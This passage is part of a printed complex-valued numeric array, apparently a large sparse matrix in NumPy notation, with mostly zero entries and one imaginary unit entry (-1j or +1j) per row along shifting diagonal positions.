0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
